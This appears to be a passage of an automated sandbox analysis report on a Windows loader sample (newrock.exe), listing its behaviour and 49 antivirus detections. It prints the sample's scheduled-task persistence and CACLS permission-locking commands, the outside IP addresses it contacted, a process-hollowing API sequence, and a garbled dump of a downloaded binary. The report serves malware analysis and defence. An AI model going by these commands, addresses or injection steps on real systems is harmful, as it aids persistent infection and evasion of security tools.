- unable to initialize heap R6027 - not enough space for lowio initialization R6026 - not enough space for stdio initialization R6025 - pure virtual function call R6024 - not enough space for _onexit/atexit table R6019 - unable to open console device R6018 - unexpected heap error R6017 - unexpected multithread lock error R6016 - not enough space for thread data This application has requested the Runtime to terminate it in an unusual way. Please contact the application's support team for more information. R6009 - not enough space for environment R6008 - not enough space for arguments R6002 - floating point support not loaded Microsoft Visual C++ Runtime Library ...<program name unknown>Runtime Error! Program: ÀÀÀÀÀÀÀÀÀÀ ((((( H request_handle: 0x00cc000c	1	1	0
InternetReadFile Oct. 16, 2023, 9:43 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd?Ïdð.&èxY.°@Z@ØY` ÀYp ðYPY\|Y)Z0 <Y(ÂY`.textæè``.dataÀ W Wì@À.rdata>Y@öX@@.pdataPY6Y@@.xdataLpYPY@@.bss-YÀ.idatap ÀYdY@À.CRT`ÐYpY@À.tlsàYrY@À.rsrcðYtY@À.reloc0ZxY@BÃDf.Hì(H6Y1ÉÇH6YÇH6YÇH5Yf8MZuHcP<HÐ8PEtfH¿5Y ¥YÀuC¹èqÁèÄ»H}6YèÄ»HM6YèÔ.H 4Y8tI1ÀHÄ(Ã¹è.Áë»@·Pfút9fúu¸{ÿÿÿø1ÉÒÁéiÿÿÿH H/è61ÀHÄ(ÃxtLÿÿÿDè1ÉEÀÁé8ÿÿÿ@f.Hì8Hõ5YLÖ~YH×~YH Ø~Y¬~YH¥~YHD$ H5YDèeÀHÄ8ÃAUATUWVSHì1À¹ HT$ H×óH«H=x4YDEÉeH%0H¬4Y1íHpL%c±YëH9Æ¹èAÿÔHèðH±3HÀuâH54Y1íøÀqÇï}YøøíH3YHHÀtE1Àº1ÉÿÐèt1H =5ÿÓ°YH4YH ýÿÿHèºèÌ.HU3YHæªYèÙ¹1ÉHHÀuëTÒt)át$¹HÀ¶ú ~æAÈAðú"ADÈëäÒuëf.ú HÀ¶ÒuðHyªYDEÀÝ/}YDkMcíIÁåLéè\|¿ÛH=}YHÅ~BDcÿ1ÛëHÃHßè¿HpHñèN¿IðHDÝHßHÁèB¿HCI9ÜuËJD-øHÇH-¶\|Yèá+Hj2YL\|Y ¥\|YHLH\|Yè<9 q\|Yo\|YÉõY\|YÒ©HÄ[^_]A\A]ÃföD$\¸ t·D$`ìéÿÿÿ@H52Y½øþýÿÿ¹èç½øþÿÿH2YH v2Yèá½íÇïýÿÿ1ÀHéåýÿÿfHÑÿs®YéVýÿÿfè½¥{YHÄ[^_]A\A]ÃDHI2YÇH ,2Yèw½é{ýÿÿÁè½f.Hì(He1YÇèºüÿÿHÄ(ÃHì(HE1YÇèüÿÿHÄ(ÃHì(è½HÀÀ¶À÷ØHÄ(ÃH éÔÿÿÿ@ÃHIYHP!ÆHÀH9ÐuôÃHñYHPfÇHÀH9ÐuòÃH·YHPfÇHÀH9ÐuòÃH}YHPfÇHÀH9ÐuòÃHYHPNfÇHÀH9ÐuòÃH¹YHPfÇHÀH9ÐuòÃÃHNYHP$fÇHÀH9ÐuòÃHtYH¢fÇHÀH9ÐuòÃHwYH¼fÇHÀH9ÐuòÃHÚYHPvfÇHÀH9ÐuòÃHYHPfÇHÀH9ÐuòÃHæYHfÇHÀH9ÐuòÃHYHP"fÇHÀH9ÐuòÃHÏYHPzfÇHÀH9ÐuòÃHuYHPfÇHÀH9ÐuòÃHÛYHPrfÇHÀH9ÐuòÃH¡YHPfÇHÀH9ÐuòÃHYHPtfÇHÀH9ÐuòÃHÍYHPfÇHÀH9ÐuòÃHsYH0fÇHÀH9ÐuòÃHYHP&fÇHÀH9ÐuòÃHÔYHPÆHÀH9ÐuôÃH¤YHPÆHÀH9ÐuôÃHlYHP ÆHÀH9ÐuôÃH4YHPÆHÀH9ÐuôÃHüYHPÆHÀH9ÐuôÃHÄYHPÆHÀH9ÐuôÃHYHPÆHÀH9ÐuôÃHTYHPÆHÀH9ÐuôÃHYHPÆHÀH9ÐuôÃHäYHPÆHÀH9ÐuôÃH¬YHPÆHÀH9ÐuôÃHtYHPÆHÀH9ÐuôÃH<YHPÆHÀH9ÐuôÃHYHPÆHÀH9ÐuôÃHÌYHPÆHÀH9ÐuôÃHYHPÆHÀH9ÐuôÃHdYHP ÆHÀH9ÐuôÃH4YHP ÆHÀH9ÐuôÃHüYHPÆHÀH9ÐuôÃHÄYHPÆHÀH9ÐuôÃHYHPÆHÀH9ÐuôÃHTYHPÆHÀH9ÐuôÃHYHPÆHÀH9ÐuôÃHäYHPÆHÀH9ÐuôÃH´YHPÆHÀH9ÐuôÃHYHPÆHÀH9ÐuôÃHLYHPÆHÀH9ÐuôÃHYHPÆHÀH9ÐuôÃHÜYHP ÆHÀH9ÐuôÃH¬YHPÆHÀH9ÐuôÃH\|YHPÆHÀH9ÐuôÃHDYHPÆHÀH9ÐuôÃHYHPÆHÀH9ÐuôÃHÔYHPÆHÀH9ÐuôÃHYHPÆHÀH9ÐuôÃHdYHPÆHÀH9ÐuôÃH,YHP ÆHÀH9ÐuôÃHôYHPÆHÀH9ÐuôÃH¼YHPÆHÀH9ÐuôÃHYHPÆHÀH9ÐuôÃHLYHPÆHÀH9ÐuôÃHYHPÆHÀH9ÐuôÃHÜYHPÆHÀH9ÐuôÃH¤YHP ÆHÀH9ÐuôÃHlYHPÆHÀH9ÐuôÃH<YHPÆHÀH9ÐuôÃHYHPÆHÀH9ÐuôÃHÔYHPÆHÀH9ÐuôÃHYHPÆHÀH9ÐuôÃHdYHP request_handle: 0x00cc000c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00450c00', u'virtual_address': u'0x00002000', u'entropy': 7.985429337511378, u'name': u'.text', u'virtual_size': u'0x00450a44'}

entropy

7.98542933751

description

A section with a high entropy has been found

entropy

0.999547613662

description

Overall entropy of this PE file is high

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

Communicates with host for which no DNS query was performed (3 events)

host	5.42.65.80
host	79.137.192.18
host	95.214.27.254

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Oct. 16, 2023, 9:43 a.m.	process_identifier: 2532 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000c8	1	0	0

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Installs itself for autorun at Windows startup (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

Detects Avast Antivirus through the presence of a library (2 events)

Time & API	Arguments	Status	Return	Repeated
LdrGetDllHandle Oct. 16, 2023, 9:43 a.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0		3221225781	0
LdrGetDllHandle Oct. 16, 2023, 9:43 a.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0		3221225781	0

Potential code injection by writing to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Oct. 16, 2023, 9:43 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2532 process_handle: 0x000000c8	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2508 called NtSetContextThread to modify thread in remote process 2532
NtSetContextThread Oct. 16, 2023, 9:43 a.m.	registers.eip: 1995571652 registers.esp: 1638384 registers.edi: 0 registers.eax: 4206040 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000000c4 process_identifier: 2532	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2508 resumed a thread in remote process 2532
NtResumeThread Oct. 16, 2023, 9:43 a.m.	thread_handle: 0x000000c4 suspend_count: 1 process_identifier: 2532	1	0	0

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	cmd /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
cmdline	CACLS "oneetx.exe" /P "test22:N"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
cmdline	CACLS "oneetx.exe" /P "test22:R" /E
cmdline	CACLS "..\207aa4515d" /P "test22:R" /E
cmdline	CACLS "..\207aa4515d" /P "test22:N"

Executed a process and injected code into it, probably while unpacking (39 events)

Time & API	Arguments	Status	Return
NtResumeThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2544	1	0
NtResumeThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2544	1	0
NtResumeThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x00000180 suspend_count: 1 process_identifier: 2544	1	0
NtResumeThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x0000020c suspend_count: 1 process_identifier: 2544	1	0
NtGetContextThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x000000e4	1	0
NtResumeThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2544	1	0
NtGetContextThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x000000e4	1	0
NtSetContextThread Oct. 16, 2023, 9:42 a.m.	registers.eip: 1921133444 registers.esp: 3731168 registers.edi: 42497032 registers.eax: 87230 registers.ebp: 3731192 registers.edx: 13 registers.ebx: 22 registers.esi: 1919073 registers.ecx: 159 thread_handle: 0x000000e4 process_identifier: 2544	1	0
NtResumeThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2544	1	0
NtResumeThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x00000220 suspend_count: 1 process_identifier: 2544	1	0
CreateProcessInternalW Oct. 16, 2023, 9:42 a.m.	thread_identifier: 2640 thread_handle: 0x000003ac process_identifier: 2636 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003b4	1	1
NtResumeThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x00000348 suspend_count: 1 process_identifier: 2544	1	0
CreateProcessInternalW Oct. 16, 2023, 9:42 a.m.	thread_identifier: 2684 thread_handle: 0x000003b4 process_identifier: 2680 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\oldplayer.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\oldplayer.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\oldplayer.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003cc	1	1
CreateProcessInternalW Oct. 16, 2023, 9:42 a.m.	thread_identifier: 2816 thread_handle: 0x000002e8 process_identifier: 2812 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002f0	1	1
NtResumeThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x0000023c suspend_count: 1 process_identifier: 2812	1	0
CreateProcessInternalW Oct. 16, 2023, 9:42 a.m.	thread_identifier: 2908 thread_handle: 0x00000254 process_identifier: 2904 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000025c	1	1
CreateProcessInternalW Oct. 16, 2023, 9:42 a.m.	thread_identifier: 2960 thread_handle: 0x000001c8 process_identifier: 2956 current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000248	1	1
CreateProcessInternalW Oct. 16, 2023, 9:42 a.m.	thread_identifier: 2500 thread_handle: 0x0000039c process_identifier: 2508 current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d filepath: C:\Users\test22\AppData\Local\Temp\1000519001\toolspub2.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000519001\toolspub2.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000519001\toolspub2.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003c4	1	1
CreateProcessInternalW Oct. 16, 2023, 9:43 a.m.	thread_identifier: 2628 thread_handle: 0x000003b0 process_identifier: 2624 current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d filepath: C:\Users\test22\AppData\Local\Temp\1000521001\latestX.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000521001\latestX.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000521001\latestX.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003cc	1	1
CreateProcessInternalW Oct. 16, 2023, 9:42 a.m.	thread_identifier: 3040 thread_handle: 0x0000008c process_identifier: 3036 current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW Oct. 16, 2023, 9:42 a.m.	thread_identifier: 1216 thread_handle: 0x00000088 process_identifier: 744 current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "oneetx.exe" /P "test22:N" filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW Oct. 16, 2023, 9:42 a.m.	thread_identifier: 1404 thread_handle: 0x0000008c process_identifier: 1384 current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "oneetx.exe" /P "test22:R" /E filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW Oct. 16, 2023, 9:42 a.m.	thread_identifier: 2068 thread_handle: 0x0000008c process_identifier: 2064 current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
CreateProcessInternalW Oct. 16, 2023, 9:42 a.m.	thread_identifier: 148 thread_handle: 0x00000094 process_identifier: 2192 current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "..\207aa4515d" /P "test22:N" filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW Oct. 16, 2023, 9:42 a.m.	thread_identifier: 2224 thread_handle: 0x0000008c process_identifier: 2228 current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "..\207aa4515d" /P "test22:R" /E filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
NtResumeThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x000000a0 suspend_count: 1 process_identifier: 744	1	0
NtResumeThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x0000009c suspend_count: 1 process_identifier: 1384	1	0
NtResumeThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x000000a0 suspend_count: 1 process_identifier: 2192	1	0
NtResumeThread Oct. 16, 2023, 9:42 a.m.	thread_handle: 0x00000098 suspend_count: 1 process_identifier: 2228	1	0
CreateProcessInternalW Oct. 16, 2023, 9:43 a.m.	thread_identifier: 2520 thread_handle: 0x000000c4 process_identifier: 2532 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\1000519001\toolspub2.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000519001\toolspub2.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000519001\toolspub2.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000000c8	1	1
NtGetContextThread Oct. 16, 2023, 9:43 a.m.	thread_handle: 0x000000c4	1	0
NtUnmapViewOfSection Oct. 16, 2023, 9:43 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2532 process_handle: 0x000000c8	1	0
NtAllocateVirtualMemory Oct. 16, 2023, 9:43 a.m.	process_identifier: 2532 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000c8	1	0
WriteProcessMemory Oct. 16, 2023, 9:43 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2532 process_handle: 0x000000c8	1	1
NtSetContextThread Oct. 16, 2023, 9:43 a.m.	registers.eip: 1995571652 registers.esp: 1638384 registers.edi: 0 registers.eax: 4206040 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000000c4 process_identifier: 2532	1	0
NtResumeThread Oct. 16, 2023, 9:43 a.m.	thread_handle: 0x000000c4 suspend_count: 1 process_identifier: 2532	1	0

File has been identified by 49 AntiVirus engines on VirusTotal as malicious (49 events)

Lionic	Trojan.Win32.ShortLoader.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	IL:Trojan.MSILZilla.9891
FireEye	Generic.mg.5678c3a93dafcd5b
Skyhigh	BehavesLike.Win32.Generic.rc
ALYac	IL:Trojan.MSILZilla.9891
Malwarebytes	Trojan.Crypt.MSIL.Generic
VIPRE	IL:Trojan.MSILZilla.9891
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Ransomware ( 005a8b921 )
Alibaba	TrojanDownloader:MSIL/Mokes.e7ed1745
K7GW	Ransomware ( 005a8b921 )
Cybereason	malicious.481b70
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Agent.UZA
Cynet	Malicious (score: 100)
APEX	Malicious
Kaspersky	HEUR:Trojan-Downloader.MSIL.ShortLoader.gen
BitDefender	IL:Trojan.MSILZilla.9891
Avast	Win32:DropperX-gen [Drp]
Tencent	Msil.Trojan-Downloader.Shortloader.Uwhl
Sophos	Troj/ILAgent-I
DrWeb	Trojan.MulDropNET.43
TrendMicro	Trojan.Win32.SMOKELOADER.YXDJPZ
Trapmine	malicious.moderate.ml.score
Emsisoft	IL:Trojan.MSILZilla.9891 (B)
Ikarus	Trojan.MSIL.Krypt
Webroot	W32.Trojan.MSILZilla
Varist	W32/MSIL_Kryptik.FFY.gen!Eldorado
Kingsoft	malware.kb.c.998
Microsoft	Trojan:MSIL/Mokes.B!MTB
Arcabit	IL:Trojan.MSILZilla.D26A3
ZoneAlarm	HEUR:Trojan-Downloader.MSIL.ShortLoader.gen
GData	IL:Trojan.MSILZilla.9891
Google	Detected
AhnLab-V3	Malware/Win.Generic.C4478643
McAfee	GenericRXPI-VQ!5678C3A93DAF
MAX	malware (ai score=80)
VBA32	Trojan.MSIL.Injector.gen
Cylance	unsafe
Panda	Trj/GdSda.A
Rising	Trojan.AntiVM!1.CF63 (CLASSIC)
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/GenKryptik.FFMZ!tr
BitDefenderTheta	Gen:NN.ZemsilF.36738.@p0@a8xmcin
AVG	Win32:DropperX-gen [Drp]
DeepInstinct	MALICIOUS
CrowdStrike	win/malicious_confidence_100% (W)

newrock.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All